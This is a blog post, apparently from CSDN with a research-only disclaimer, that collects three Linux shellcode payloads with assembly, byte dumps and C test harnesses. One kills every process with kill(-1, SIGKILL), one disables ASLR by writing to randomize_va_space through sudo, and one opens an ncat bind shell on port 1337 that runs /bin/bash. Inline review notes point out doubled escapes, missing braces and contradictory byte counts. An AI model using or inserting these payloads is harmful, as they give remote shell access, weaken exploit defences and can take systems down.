[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)




免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。

Linux/x86 - Kill All Processes Shellcode (14 bytes)

# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------

This shellcode issues kill(-1, SIGKILL) — syscall 37 with pid = -1 and sig = 9 — which sends SIGKILL to every process the caller has permission to signal (i.e. effectively all of them when run as root).

-----------------------------[Shellcode Dump]---------------------------------

# objdump listing (AT&T syntax, i386).  Equivalent C call: kill(-1, SIGKILL).
# Register roles at the int $0x80: eax = syscall number, ebx = pid, ecx = sig.
08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax        # eax = 0
 8048062: 50                    push   %eax             # pushes a 0 dword; nothing below reads it
 8048063: b0 25                 mov    $0x25,%al        # eax = 37 = __NR_kill on i386 (upper bytes still 0)
 8048065: bb ff ff ff ff        mov    $0xffffffff,%ebx # ebx = -1: "every process the caller may signal"
 804806a: b1 09                 mov    $0x9,%cl         # cl = 9 = SIGKILL; bits 8..31 of ecx are not cleared here, so they are whatever the caller left in ecx
 804806c: cd 80                 int    $0x80            # kill(-1, SIGKILL); errno, if any, is returned negated in eax and ignored

 -----------------------------[Compile]---------------------------------------------
 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

 -----------------------------[C-Code]-----------------------------

 #include<stdio.h>
 #include<string.h>

 /* Test harness for the 14-byte listing above: the bytes are placed in a
  * writable data array and then called as a function.
  * NOTE(review): as shown here the escapes are doubled ("\\x31") and the
  * braces of main() are missing — presumably lost when the post was copied;
  * the original source must have used single backslashes and a braced body.
  * The indirect call below only works if the page holding code[] is executable;
  * the compile line above relies on -z execstack for that, and a default NX/W^X
  * build would fault at the call instead of running the payload. */
 unsigned char code[] = "\\x31\\xc0\\x50\\xb0\\x25\\xbb\\xff\\xff\\xff\\xff\\xb1\\x09\\xcd\\x80";
 main()                                   /* implicit int return type: pre-C99 style, rejected by modern compilers */
 

     printf("Shellcode Length: %d\\n", strlen(code));   /* strlen() returns size_t; %zu would match the type */

     int (*ret)() = (int(*)())code;        /* reinterpret the byte array as a function pointer */

     ret();                                /* jump into code[]: executes kill(-1, SIGKILL) */
 
Linux/x64 - 禁用 ASLR 安全 Shellcode(93 字节)
Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
/*
 ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64

 Author : Kağan Çapar
 contact: kagancapar@gmail.com
 shellcode len : 93 bytes
 compilation: gcc -fno-stack-protector -z execstack [.c] -o []
 
 Test:
 run shellcode (./aslr etc.)
 check : cat /proc/sys/kernel/randomize_va_space
 you will see "0"

 Assembly (listing decoded as 32-bit code, so every 0x48 shown as `dec eax` is actually the REX.W prefix of the following x86-64 instruction, and the lines after `call` are the embedded command string rather than instructions):

 global _start          
 section .ASLR
 _start:

 #6A3B              push byte +0x3b
 #58                pop eax
 #99                cdq
 #48                dec eax
 #BB2F62696E        mov ebx,0x6e69622f
 #2F                das
 #7368              jnc 0x75
 #005348            add [ebx+0x48],dl
 #89E7              mov edi,esp
 #682D630000        push dword 0x632d
 #48                dec eax
 #89E6              mov esi,esp
 #52                push edx
 #E836000000        call 0x56
 #6563686F          arpl [gs:eax+0x6f],bp
 #2030              and [eax],dh
 #207C2073          and [eax+0x73],bh
 #7564              jnz 0x90
 #6F                outsd
 #20746565          and [ebp+0x65],dh
 #202F              and [edi],ch
 #7072              jo 0xa7
 #6F                outsd
 #632F              arpl [edi],bp
 #7379              jnc 0xb3
 #732F              jnc 0x6b
 #6B65726E          imul esp,[ebp+0x72],byte +0x6e
 #656C              gs insb
 #2F                das
 #7261              jc 0xa6
 #6E                outsb
 #646F              fs outsd
 #6D                insd
 #697A655F76615F    imul edi,[edx+0x65],dword 0x5f61765f
 #7370              jnc 0xc2
 #61                popa
 #636500            arpl [ebp+0x0],sp
 #56                push esi
 #57                push edi
 #48                dec eax
 #89E6              mov esi,esp
 #0F05              syscall

*/

#include <stdio.h>
#include <string.h>

/* 93-byte x86-64 payload as a C string literal (7 lines: 6 x 15 bytes + 3).
 * NOTE(review): the escapes appear doubled ("\\x6a") and the line
 * continuation on the first line is "\\" — presumably artifacts of copying
 * the post rather than of the original source.
 * From "\x65\x63\x68\x6f" onward the bytes are plain ASCII: the shell command
 * from the header that writes 0 into randomize_va_space (via sudo, so it only
 * takes effect when the caller can elevate), terminated by "\x00".
 * The payload contains several 0x00 bytes (e.g. byte 13), so it is not
 * NUL-free and strlen() on it stops early. */
unsigned char ASLR[] = \\
"\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x53"
"\\x48\\x89\\xe7\\x68\\x2d\\x63\\x00\\x00\\x48\\x89\\xe6\\x52\\xe8\\x36\\x00"
"\\x00\\x00\\x65\\x63\\x68\\x6f\\x20\\x30\\x20\\x7c\\x20\\x73\\x75\\x64\\x6f"
"\\x20\\x74\\x65\\x65\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x79\\x73\\x2f"
"\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x2f\\x72\\x61\\x6e\\x64\\x6f\\x6d\\x69\\x7a"
"\\x65\\x5f\\x76\\x61\\x5f\\x73\\x70\\x61\\x63\\x65\\x00\\x56\\x57\\x48\\x89"
"\\xe6\\x0f\\x05";

/* Harness: prints a length for ASLR[] and then jumps into it.
 * NOTE(review): main's braces are missing as shown — presumably lost when
 * the post was copied.  The call only works if the page holding ASLR[] is
 * executable; the header's compile line uses -z execstack for that, and a
 * default NX/W^X build faults at the call instead. */
int main()

 printf("Shellcode len: %d\\n", strlen(ASLR));   /* strlen() stops at the first 0x00 byte (index 13 of the literal), so this prints 13, not 93; also %d vs size_t */
 
 int (*ret)() = (int(*)())ASLR;   /* reinterpret the byte array as a function pointer */
 
 ret();                           /* jump into ASLR[]; does not return if the execve it ends with succeeds */
 


Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
/* 
   Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
   Author : T3jv1l
   Contact: t3jv1l@gmail.com
   Twitter:https://twitter.com/T3jv1l
   Shellcode len : 119 bytes
   Compilation: gcc  shellcode.c -o shellcode
   Compilation on an x64 host (32-bit build): gcc -m32 shellcode.c -o shellcode
   Tested On: Ubuntu 16.04.5 LTS 
   Arch: x86
   Size: 95 bytes
   Thanks for helping NytroRST


############################################################################
global _start:
_start:
jmp short todo


shellcode:

xor eax, eax            ;Zero out eax
xor ebx, ebx            ;Zero out ebx 
xor ecx, ecx            ;Zero out ecx
cdq	      		;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4       ;Setresuid syscall 164 (0xa4)
int 0x80                ;Syscall execute
pop esi                 ;Esi contain the string in db
xor eax, eax            ;Zero out eax
mov[esi+13], al         ;Null terminate /usr/bin/ncat
mov[esi+22], al         ;Null terminate -lvp1337
mov[esi+34], al         ;Null terminate -e/bin/bash
mov[esi+35], esi        ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14]       ;Load address of -lvp1337
mov[esi+39], ebx        ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23]       ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx        ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax        ;Zero out DDDD
mov al, 11              ;11 is execve syscall number 
mov ebx, esi            ;Store address of /usr/bin/ncat
lea ecx, [esi+35]       ;Load address of ptr to argv[] array
lea edx, [esi+47]       ;envp[] NULL
int 0x80                ;Syscall execute

todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
;   012345678901234567890123456789012345678901234567890

######################################################################################

ncat.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	eb 35                	jmp    37 <todo>

00000002 <shellcode>:
   2:	31 c0                	xor    %eax,%eax
   4:	31 db                	xor    %ebx,%ebx
   6:	31 c9                	xor    %ecx,%ecx
   8:	99                   	cltd   
   9:	b0 a4                	mov    $0xa4,%al
   b:	cd 80                	int    $0x80
   d:	5e                   	pop    %esi
   e:	31 c0                	xor    %eax,%eax
  10:	88 46 0d             	mov    %al,0xd(%esi)
  13:	88 46 16             	mov    %al,0x16(%esi)
  16:	88 46 22             	mov    %al,0x22(%esi)
  19:	89 76 23             	mov    %esi,0x23(%esi)
  1c:	8d 5e 0e             	lea    0xe(%esi),%ebx
  1f:	89 5e 27             	mov    %ebx,0x27(%esi)
  22:	8d 5e 17             	lea    0x17(%esi),%ebx
  25:	89 5e 2b             	mov    %ebx,0x2b(%esi)
  28:	89 46 2f             	mov    %eax,0x2f(%esi)
  2b:	b0 0b                	mov    $0xb,%al
  2d:	89 f3                	mov    %esi,%ebx
  2f:	8d 4e 23             	lea    0x23(%esi),%ecx
  32:	8d 56 2f             	lea    0x2f(%esi),%edx
  35:	cd 80                	int    $0x80

00000037 <todo>:
  37:	e8 c6 ff ff ff       	call   2 <shellcode>
  3c:	2f                   	das    
  3d:	75 73                	jne    b2 <todo+0x7b>
  3f:	72 2f                	jb     70 <todo+0x39>
  41:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  44:	2f                   	das    
  45:	6e                   	outsb  %ds:(%esi),(%dx)
  46:	63 61 74             	arpl   %sp,0x74(%ecx)
  49:	23 2d 6c 76 70 31    	and    0x3170766c,%ebp
  4f:	33 33                	xor    (%ebx),%esi
  51:	37                   	aaa    
  52:	23 2d 65 2f 62 69    	and    0x69622f65,%ebp
  58:	6e                   	outsb  %ds:(%esi),(%dx)
  59:	2f                   	das    
  5a:	62 61 73             	bound  %esp,0x73(%ecx)
  5d:	68 23 41 41 41       	push   $0x41414123
  62:	41                   	inc    %ecx
  63:	42                   	inc    %edx
  64:	42                   	inc    %edx
  65:	42                   	inc    %edx
  66:	42                   	inc    %edx
  67:	43                   	inc    %ebx
  68:	43                   	inc    %ebx
  69:	43                   	inc    %ebx
  6a:	43                   	inc    %ebx
  6b:	44                   	inc    %esp
  6c:	44                   	inc    %esp
  6d:	44                   	inc    %esp
  6e:	44                   	inc    %esp
###################################################################################
*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

/* Function-pointer view of the mapped payload; assigned in main(). */
int (*shellcodetotest)();

/* 95-byte i386 payload (matches the objdump listing above up to the "#"
 * after "/bin/bash").  NOTE(review): escapes appear doubled ("\\xeb") —
 * presumably an artifact of copying the post.  The header gives the length
 * as 119 bytes in one place and 95 in another; this literal is 95 bytes.
 * The "AAAABBBBCCCCDDDD" placeholders from the assembly are not part of the
 * literal: the payload writes the argv/envp pointers there at run time,
 * starting exactly at the end of these 95 bytes, which is why main() maps a
 * buffer larger than the literal. */
char shellcode[] = "\\xeb\\x35\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x99\\xb0\\xa4\\xcd\\x80\\x5e\\x31\\xc0\\x88\\x46\\x0d\\x88\\x46\\x16\\x88\\x46\\x22\\x89\\x76\\x23\\x8d\\x5e\\x0e\\x89\\x5e\\x27\\x8d\\x5e\\x17\\x89\\x5e\\x2b\\x89\\x46\\x2f\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x23\\x8d\\x56\\x2f\\xcd\\x80\\xe8\\xc6\\xff\\xff\\xff\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\\x61\\x74\\x23\\x2d\\x6c\\x76\\x70\\x31\\x33\\x33\\x37\\x23\\x2d\\x65\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x23";
 


/* Harness: maps a 150-byte anonymous RWX region, copies the payload in and
 * calls it.
 * NOTE(review): the braces of main() and of the if-body are missing as
 * shown — presumably lost when the post was copied; read literally,
 * exit(-1) would run unconditionally.
 * 150 > sizeof(shellcode) because the payload writes 16 bytes of argv/envp
 * pointers immediately after the 95-byte literal (the AAAA..DDDD slots in
 * the assembly); the extra mapped bytes hold them.
 * PROT_EXEC|PROT_WRITE|PROT_READ on one mapping is a W^X violation; a
 * hardened policy (e.g. an SELinux execmem denial) can refuse this mmap,
 * which is what the MAP_FAILED check is for. */
int main(int argc, char **argv) 
	void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
	if(ptr == MAP_FAILED)
		perror("mmap");
		exit(-1);
printf("Shellcode Length:  %d\\n", strlen(shellcode));   /* strlen() returns size_t; %zu would match.  Prints 95 for this literal. */
	


	memcpy(ptr, shellcode, sizeof(shellcode));   /* sizeof includes the terminating NUL: 96 bytes copied */
	shellcodetotest = ptr;
	shellcodetotest();   /* does not return if the execve the payload ends with succeeds */
	return 0;


